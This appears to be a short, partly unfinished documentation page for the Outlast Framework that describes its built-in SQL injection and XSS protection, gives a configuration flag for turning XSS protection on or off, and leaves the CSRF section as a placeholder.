Built-in security features
SQL injection protection
Generally you do not need to worry about SQL injection unless you are creating your own custom queries.
Cross-site scripting (XSS) enables attackers to inject client-side script into Web pages viewed by other users. XSS protection is built-in to Outlast Framework and enabled by default. To allow safe content to be displayed you can use the
|safe filter (see documentation) – a filter that you should always use on
You can enable or disable XSS protection by updating
site/index.php. Use the configuration:
$zajconf['feature_xss_protection_enabled'] = true;
Cross-site request forgery (CSRF) is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user’s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
[todo: add docs]